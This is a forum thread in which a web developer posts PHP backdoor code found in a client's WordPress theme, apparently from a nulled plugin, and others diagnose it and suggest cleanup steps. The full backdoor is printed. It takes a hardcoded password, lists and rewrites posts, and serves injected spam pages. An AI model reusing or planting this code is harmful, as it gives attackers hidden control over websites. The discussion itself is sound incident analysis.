Resend my activation email : Register : Log in 
BCF: Bike Chat Forums


Any coders : PHP / mySQL - Hacked file help

Reply to topic
Bike Chat Forums Index -> The Geek Zone
View previous topic : View next topic  
Author Message

Jayy
Mr. Ponzi



Joined: 08 Jun 2009
Karma :

PostPosted: 23:56 - 17 May 2017    Post subject: Any coders : PHP / mySQL - Hacked file help Reply with quote

Well, I found some code inside a functions.php file of a Wordpress install. Client had told me he found "free premium plugins" and installed them... I thought, oh no, what have you done?

Any ideas what this does?

As far as I can work out, some kind of password sniffer?

Code:
<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '24daf8bf7eb6d45d9aa91bf1979b414a'))
   {
      switch ($_REQUEST['action'])
         {
            case 'get_all_links';
               foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                  {
                     $data['code'] = '';
                     
                     if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                        {
                           $data['code'] = $_[1];
                        }
                     
                     print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                  }
            break;
            
            case 'set_id_links';
               if (isset($_REQUEST['data']))
                  {
                     $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');
                     
                     $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                     if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                     if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                        {
                           print "true";
                        }
                  }
            break;
            
            case 'create_page';
               if (isset($_REQUEST['remove_page']))
                  {
                     if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                        {
                           print "true";
                        }
                  }
               elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                  {
                     if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                        {
                           print "true";
                        }
                  }
            break;
            
            default: print "ERROR_WP_ACTION WP_URL_CD";
         }
         
      die("");
   }

   
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
   {
      $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
      if ($data -> full_content)
         {
            print stripslashes($data -> content);
         }
      else
         {
            print '<!DOCTYPE html>';
            print '<html ';
            language_attributes();
            print ' class="no-js">';
            print '<head>';
            print '<title>'.stripslashes($data -> title).'</title>';
            print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
            print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
            print '<meta name="robots" content="index, follow" />';
            print '<meta charset="';
            bloginfo( 'charset' );
            print '" />';
            print '<meta name="viewport" content="width=device-width">';
            print '<link rel="profile" href="http://gmpg.org/xfn/11">';
            print '<link rel="pingback" href="';
            bloginfo( 'pingback_url' );
            print '">';
            wp_head();
            print '</head>';
            print '<body>';
            print '<div id="content" class="site-content">';
            print stripslashes($data -> content);
            get_search_form();
            get_sidebar();
            get_footer();
         }
         
      exit;
   }


?><?php
 Back to top
View user's profile Send private message You must be logged in to rate posts

ScaredyCat
World Chat Champion



Joined: 19 May 2012
Karma :

PostPosted: 00:08 - 18 May 2017    Post subject: Reply with quote

Looks to me like it gives someone the ability to remotely update post content. Emergency quick fix is to change the password. Presumably the site is running the latest version of wordpress? If so, download the tarball and extract it over the top of the base wordpress files. Take backups first, incase you fuck it up.

Most definitely a problem.

edit:

looks like class.wp.php is going to be a problem too.

Following references found

https://stackoverflow.com/questions/40350225/malware-research-what-this-code-do-in-php

https://www.reddit.com/r/Wordpress/comments/5ll3nk/weirdsuspicious_code_on_the_top_of_themes/
____________________
Honda CBF125 ➝ NC700X
Honda CBF125 ↳ Speed Triple
 Back to top
View user's profile Send private message You must be logged in to rate posts

Kickstart
The Oracle



Joined: 04 Feb 2002
Karma :

PostPosted: 00:25 - 18 May 2017    Post subject: Reply with quote

Hi

Yep, allowing some posts to be modified by a user with a specific password. Also the ability to list out some posts (probably to make it easier to screw around with them).

Note that once used it will likely screw up the details on the post table, and this might already have happened.

Amusing that a hacky type script is using mysql_escape_string

All the best

Katy
____________________
Traxpics, track day and racing photographs - Bimota Forum - Bike performance / thrust graphs for choosing gearing
 Back to top
View user's profile Send private message Send e-mail You must be logged in to rate posts

Jayy
Mr. Ponzi



Joined: 08 Jun 2009
Karma :

PostPosted: 13:17 - 18 May 2017    Post subject: Reply with quote

Scenario was : Client had a guy "doing website stuff" for him but had messaged me to remove all his access as he didn't trust this guy.

I start changing all passwords on hosting, Wordpress, emails, etc etc.

Then he asks about is there a way to get login notifications, so I enabled them via Wordfence.

Wordfence flagged the file as being found 20 hrs ago when I started looking in to it.

Compared the functions.php file with a backup I had from 6 months ago of his site and saw the added code I pasted up there.

From doing my own research and following them links ScaredyCat, I'm not sure what damage this has done.

I don't see the class.wp.php file, nor do I see any of those other files they reference but I did see the _datalist table in the database (nothing in it).

Wordfence detects no core files changed, so I don't see the point in replacing all them.

All plugins are up to date and Wordpress is. All passwords changed and backups taken.

Will keep an eye on it, client is reluctant to want to spend money on having it fixed properly (don't you just love them?).

Client is the one who installed the premium version of Yoast SEO.... which he downloaded off a nulled site Neutral

I actually see nulled plugins installed on sites quite frequently these days, I don't know whether it's some office person who doesn't really understand the gravity of what they're doing or some dev who also doesn't understand / wants to save a couple bucks :/
 Back to top
View user's profile Send private message You must be logged in to rate posts

ScaredyCat
World Chat Champion



Joined: 19 May 2012
Karma :

PostPosted: 13:23 - 18 May 2017    Post subject: Reply with quote

Jayy wrote:

Compared the functions.php file with a backup I had from 6 months ago of his site and saw the added code I pasted up there.


Then it's been there for >6 months, it's still a problem. That code is NOT in ANY of the installs I look after and they are all up to date. I double checked when you posted this.


Jayy wrote:

Wordfence detects no core files changed, so I don't see the point in replacing all them.


If wordfence doesn't see that any core files have changed then it's worthless.

Download the wordpress tarball/ zip and extract it on your PC. Look at functions.php in the includes folder and you'll see that the code does not exist.

Code:
andy@nevdull:~/_Downloads/wordpress$ grep -Ri get_all_links ./

andy@nevdull:~/_Downloads/wordpress$

____________________
Honda CBF125 ➝ NC700X
Honda CBF125 ↳ Speed Triple


Last edited by ScaredyCat on 13:36 - 18 May 2017; edited 2 times in total
 Back to top
View user's profile Send private message You must be logged in to rate posts

Kickstart
The Oracle



Joined: 04 Feb 2002
Karma :

PostPosted: 13:24 - 18 May 2017    Post subject: Reply with quote

Hi

Check the post_content field on the posts table. If the hack had been utilised it could have changed the data there, and a lot of the pages basically stored in there.

All the best

Katy
____________________
Traxpics, track day and racing photographs - Bimota Forum - Bike performance / thrust graphs for choosing gearing
 Back to top
View user's profile Send private message Send e-mail You must be logged in to rate posts

Jayy
Mr. Ponzi



Joined: 08 Jun 2009
Karma :

PostPosted: 15:25 - 18 May 2017    Post subject: Reply with quote

I know it hasn't been there 6 months, Wordfence detected it a couple days ago (20 hrs prior to me checking it out) and Wordfence has been on there for 6 months+.

It's entirely possible it has been sitting dormant but I'm also confident Wordfence would have detected it as it's the best security plugin on the market.

I should have been more clear that it was in functions.php in the theme folder not core Wordpress.

Also running Patchman on the server so it's checking files against every version of Wordpress as well as Wordfence scanning, so again, confident that no core Wordpress files have been modified.

I'm more curious as to how this got on there. Client installed that nulled plugin months ago.
 Back to top
View user's profile Send private message You must be logged in to rate posts
Old Thread Alert!

The last post was made 6 years, 316 days ago. Instead of replying here, would creating a new thread be more useful?
  Display posts from previous:   
This page may contain affiliate links, which means we may earn a small commission if a visitor clicks through and makes a purchase. By clicking on an affiliate link, you accept that third-party cookies will be set.

Post new topic   Reply to topic    Bike Chat Forums Index -> The Geek Zone All times are GMT + 1 Hour
Page 1 of 1

 
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You cannot download files in this forum

Read the Terms of Use! - Powered by phpBB © phpBB Group
 

Debug Mode: ON - Server: birks (www) - Page Generation Time: 0.10 Sec - Server Load: 0.13 - MySQL Queries: 17 - Page Size: 69.53 Kb